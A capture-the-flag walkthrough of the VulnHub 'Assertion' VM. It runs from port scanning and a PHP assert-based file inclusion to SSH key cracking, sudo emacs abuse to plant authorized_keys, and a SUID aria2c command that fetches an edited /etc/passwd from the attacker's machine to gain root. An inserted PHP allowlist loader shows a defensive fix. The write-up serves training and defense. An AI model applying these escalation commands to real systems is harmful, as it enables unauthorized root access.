I am back with another interesting article. Today we are going to solve another VM, Assertion from VulnHub. This is an intermediate level challenge. This is my honest walkthrough of this VM.
IP of the target : 192.168.1.90
As usual, I started with an nmap scan to find open ports and the services running on the system, using the command
sudo nmap -sC -sV -Pn -p- 192.168.1.90
On port 80 I found a web application with several options in the navigation bar. After clicking on one of the pages I was redirected to that page, but when I checked the URL I found a GET parameter containing the name of the page I had clicked on, which suggests this web app is vulnerable to an LFI attack.
I tried to include the /etc/passwd file, but using ../etc/passwd only displayed a message.
I have faced this kind of thing in other challenges, where "../" or ".." is blocked, and to bypass it I used URL-encoded "../" as well as double-encoded "../", but in this VM nothing worked. Thinking this might be a rabbit hole, I went back to enumeration, so next I tried directory brute-forcing using the command
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 --hc 404 http://192.168.1.90/FUZZ
After enumerating each directory, I found the /pages/ directory to be interesting.
After opening these pages I found that they are quite similar to the web pages I had found in the root directory. Looking at the GET parameter, it was something like /index.php?page=gallery, so I tried including index.php itself and got the error "File does not exist". Something strange was happening here. Next I tried to include the web pages I had just found in /pages/, and yes, it worked, but only without the .php extension, i.e. http://192.168.1.90/index.php?page=gallery. Next I tried bypassing this using "?" and "&", and I also went through a HackerOne report, but that didn't work either. After losing all hope I messaged the author of this VM for a hint, and he told me "Name of the VM is the hint". Then a PHP function came to mind; I started searching about it and luckily found something really interesting that gave me LFI.
', '..') === false and $myfile = **************************************************
Umm, this looks interesting. Next I tried searching for some useful files, maybe I could find SSH creds, but got nothing. Then I started writing some reverse shell scripts in the /tmp/ directory, but at that point I still had no RCE to execute those scripts. After playing for some time with the malicious input I found a way to get RCE.
And that's it, now I can pop a shell :)
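From the defender's side, the lesson of this LFI is that a substring check for ".." on an attacker-controlled page name (the strpos fragment above) is the wrong control, because any flaw in how that string is later evaluated bypasses it. The following PHP is an added example, not the VM's source, of an allowlist-based loader for index.php?page=...; it assumes the page files live in a pages/ directory next to index.php and that the default page is named home.

```php
<?php
// Added example, not the VM's code: resolve index.php?page=... against an
// allowlist derived from the pages/ directory instead of filtering the
// request string for "..". The request is never evaluated, only compared.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumption: pages live here

/**
 * Return the absolute path of the page file to include, or null when the
 * requested name is not one of the known pages.
 */
function resolvePage(string $requested): ?string
{
    // 1. Syntactic allowlist: page names are plain identifiers. This rejects
    //    "..", "/", NUL bytes, "?", "&" and any encoded variants up front.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }

    // 2. Semantic allowlist: the set of valid names comes from the files that
    //    actually exist in PAGES_DIR, never from the request.
    $allowed = [];
    foreach (glob(PAGES_DIR . '/*.php') ?: [] as $file) {
        $allowed[basename($file, '.php')] = true;
    }
    if (!isset($allowed[$requested])) {
        return null;
    }

    // 3. Defence in depth: confirm the resolved path is still inside PAGES_DIR
    //    (guards against symlinks or a misconfigured PAGES_DIR).
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    $base = realpath(PAGES_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$target = resolvePage($_GET['page'] ?? 'home');   // assumption: default page
if ($target === null) {
    http_response_code(404);
    exit('File does not exist');
}
require $target;
```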
It's time for some enumeration :) After searching through some useful directories I found id_rsa keys, and after cracking the passphrase with john I found the password and could gain access to the shell of user soz using these keys and the passphrase.
I tried privilege escalation using the lxd method but it didn't work, but when I checked the user's privileges I found something interesting.
I know that emacs is a file editing tool, and we can run it as user fnx, which means I can create a file inside /home/fnx/.s**/auth******_ke** and gain access to the shell of user fnx.
sudo -u fnx /usr/bin/emacs /home/fnx/.s**/auth*******
Now I pasted my local system's id_rsa.pub key here, and after that, using the command ssh -i id_rsa firstname.lastname@example.org, I gained access to the shell of the fnx user.
Now I checked for the user's privileges but found nothing, so next I started to search for SUID binaries and found one: /usr/bin/aria2c.
After checking some methods from GTFOBins that didn't work, I decided to read the man page of this tool, and after using some of its flags I was able to overwrite /etc/passwd.
Original /etc/passwd file
Now I used the command openssl passwd -1 -salt yash yash to create a password hash for a user yash with password yash, then copied the original /etc/passwd file to my local system and edited it like this
aria2c command =>
/usr/bin/aria2c --allow-overwrite -o passwd http://192.168.1.103:8000/passwd
And now I can get root access!
And that completes our challenge. If my walkthrough helped you, then please consider donating to us to keep the website advertisement free :)